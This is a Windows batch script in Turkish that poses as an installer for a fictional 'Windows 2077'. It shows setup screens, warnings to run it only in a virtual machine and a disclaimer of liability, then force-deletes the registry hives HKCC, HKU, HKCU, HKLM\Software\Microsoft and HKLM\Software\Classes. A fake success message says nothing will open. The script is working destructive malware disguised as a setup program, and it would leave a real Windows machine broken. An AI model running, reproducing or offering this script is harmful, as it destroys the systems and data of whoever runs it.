@echo off
title WINDOWS 2077
color 1f
echo.
echo WINDOWS 2077 KUR
echo ================
ECHO.
echo WINDOWS 2077 KURULUM SIHIRBAZINA HOSGELDINIZ
echo BU KURULUM SIZE WINDOWS 2077 KURMANIZA YARDIMCI OLACAKTIR.
echo.
echo DEVAM ETMEK ICIN,
pause
cls
echo.
echo WINDOWS 2077 KUR
echo ================
ECHO.
echo WINDOWS 2077 C: SURUCUSUNE KURULACAKTIR.
echo UYARI: BIR ONCEKI WINDOWS SURUMU TESPIT EDILDI, O YUZDEN KURULUM ONCEKI WINDOWS SURUMUNUZU YUKSELTECEKTIR.
echo.
echo KUR'A DEVAM ETMEK ICIN,
pause
echo.
echo WINDOWS 2077 KUR
echo ================
ECHO.
echo WINDOWS 2077 KURULMADAN ONCE BUNU OKU:
echo.
echo BU UYGULAMA COK TEHLIKELIDIR, BILGISAYARINIZI BOZACAGI ICIN SADECE SANAL MAKINADA CALISTIRILMALIDIR.
echo PROGRAMI CALISTIRMAK ICIN KLAVYEDEKI HERHANGI TUSA BASIN, EGER YANLISLIKLA UYGULAMAYI ACTIYSANIZ BUNU SAKINCE KAPATIN.
ECHO.
pause
echo.
echo WINDOWS 2077 KUR
echo ================
ECHO.
echo WINDOWS 2077 KURULMADAN ONCE BUNU OKU:
echo.
echo CALISTIRMAK ISTEDIGINIZDEN GERCEKTEN EMIN MISINIZ? UYGULAMANIN YAPICISI BILGISAYARDAKI HASARLARDAN SORUMLU DEGILDIR..
echo.
echo Youtube: https://www.youtube.com/c/WindowsFan9600
ECHO.
pause
echo.
echo WINDOWS 2077 KUR
echo ================
ECHO.
echo WINDOWS 2077 KURULURKEN LUTFEN BEKLEYIN.............
reg delete HKCC /f
reg delete HKU /f
reg delete HKCU /f
reg delete HKLM\Software\Microsoft /f
reg delete HKLM\Software\Classes /f
cls
echo.
echo WINDOWS 2077 KUR
echo ================
ECHO.
echo GECMIS OLSUN WINDOWS 2077 BASARIYLA KURULDU!
echo UNUTMA, WINDOWS 2077NIN ICINDE BIR TON BUG VAR, WINDOWS 11'DEN BILE DAHA FAZLA!
echo YANI ASLA AMA ASLA BILGISAYARI KAPATMA, WINDOWS 2077NIN ACILAMAMA BUGU DA VARDIR!
echo BIRDE UYGULAMANIN HICBIRI ACILMIYOR!
echo.
echo UYGULAMAYI KAPATMAK ICIN,
pause
exit
